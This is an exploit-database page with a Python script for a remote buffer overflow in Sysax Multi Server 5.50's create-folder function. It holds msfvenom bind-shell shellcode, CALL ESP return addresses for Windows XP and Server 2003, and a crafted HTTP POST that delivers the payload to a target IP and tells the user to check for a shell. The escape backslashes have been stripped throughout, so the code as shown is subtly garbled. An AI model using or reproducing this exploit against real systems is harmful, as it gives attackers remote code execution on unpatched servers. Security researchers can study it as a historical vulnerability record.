Sysax Multi Server 5.50 Create Folder BOF

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Sysax Multi Server 5.50 Create Folder BOF
# Published : 2012-01-18
# Author :
# Previous Title : JBoss AS Remote Exploit v2
# Next Title : TFTP Server 1.4 ST (RRQ) Buffer Overflow Exploit
#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server 5.50 Create Folder BOF
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP)
#Date Discovered: January 13, 2012
#Vendor Contacted: January 15, 2012
#Vendor Response: January 16, 2012
#Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue
#Additional exploit details, notes and assumptions can be found here:
#http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html
##########################################################################################################

import socket,sys

if len(sys.argv) != 5:
    print "[+] Usage: ./filename.py <Target IP> <Port> <SID> <XP or 2K3>"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
sid = sys.argv[3]
os = sys.argv[4]

if len(sid) != 40:
    print "[X] Something is wrong with your SID, it should be 40 bytes long."
    print "[X] Refer to http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html"
    sys.exit(1)

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "x00"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shell = ("xdaxdcxd9x74x24xf4x5fx2bxc9xb8xb7x6exc5xe9" 
"xb1x56x83xc7x04x31x47x14x03x47xa3x8cx30x15" 
"x23xd9xbbxe6xb3xbax32x03x82xe8x21x47xb6x3c" 
"x21x05x3axb6x67xbexc9xbaxafxb1x7ax70x96xfc" 
"x7bxb4x16x52xbfxd6xeaxa9x93x38xd2x61xe6x39" 
"x13x9fx08x6bxccxebxbax9cx79xa9x06x9cxadxa5" 
"x36xe6xc8x7axc2x5cxd2xaax7axeax9cx52xf1xb4" 
"x3cx62xd6xa6x01x2dx53x1cxf1xacxb5x6cxfax9e" 
"xf9x23xc5x2exf4x3ax01x88xe6x48x79xeax9bx4a" 
"xbax90x47xdex5fx32x0cx78x84xc2xc1x1fx4fxc8" 
"xaex54x17xcdx31xb8x23xe9xbax3fxe4x7bxf8x1b" 
"x20x27x5bx05x71x8dx0ax3ax61x69xf3x9exe9x98" 
"xe0x99xb3xf4xc5x97x4bx05x41xafx38x37xcex1b" 
"xd7x7bx87x85x20x7bxb2x72xbex82x3cx83x96x40" 
"x68xd3x80x61x10xb8x50x8dxc5x6fx01x21xb5xcf" 
"xf1x81x65xb8x1bx0ex5axd8x23xc4xedxdexedx3c" 
"xbex88x0fxc3x51x15x99x25x3bxb5xcfxfexd3x77" 
"x34x37x44x87x1ex6bxddx1fx16x65xd9x20xa7xa3" 
"x4ax8cx0fx24x18xdex8bx55x1fxcbxbbx1cx18x9c" 
"x36x71xebx3cx46x58x9bxddxd5x07x5bxabxc5x9f" 
"x0cxfcx38xd6xd8x10x62x40xfexe8xf2xabxbax36" 
"xc7x32x43xbax73x11x53x02x7bx1dx07xdax2axcb" 
"xf1x9cx84xbdxabx76x7ax14x3bx0exb0xa7x3dx0f" 
"x9dx51xa1xbex48x24xdex0fx1dxa0xa7x6dxbdx4f" 
"x72x36xcdx05xdex1fx46xc0x8bx1dx0bxf3x66x61" 
"x32x70x82x1axc1x68xe7x1fx8dx2ex14x52x9exda" 
"x1axc1x9fxce")

#No DEP bypass :(
if os == "2K3":
     junk = "x41" * 648
     jump = "xDFxF2xE5x77"	#77E5F2DF CALL ESP kernel32.dll
     buf = junk + jump + "x90" * 10 + shell + "x44" * 1000

if os == "XP":
     junk = "x41" * 667
     jump = "xF0x69x83x7C" 	#7C8369F0 CALL ESP kernel32.dll
     buf = junk + jump + "x90" * 50 + shell + "x44" * 1000

print "================================================"
print "[*] Sysax Multi Server 5.50 Create Folder BOF"
print "[*] ------------------by cd1zz------------------"
print "[*] Launching exploit against " + target + "...."
print "================================================"

head = "POST /scgi?sid="+sid+"&pid=mk_folder2_name1.htm HTTP/1.1rn"
head += "Host: rn"
head += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1rn"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
head += "Accept-Language: en-us,en;q=0.5rn"
head += "Accept-Encoding: gzip, deflatern"
head += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
head += "Proxy-Connection: keep-alivern"
head += "Referer: http://"+target+"/scgi?sid="+sid+"&pid=mk_folder1_name1.htmrn"
head += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231rn"
head += "Content-Length: 171rnrn"
head += "-----------------------------1190753071675116720811342231rn"
head += "Content-Disposition: form-data; name="e2"rnrn"
head += buf+"rn"
head += "-----------------------------1190753071675116720811342231--rnrn"
  
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "rn")
    print "[*] Payload sent!"
    print "[*] Go check your shell..."
    s.recv(1024)
    s.close()
except:
    print "[X] Meh! Fail!"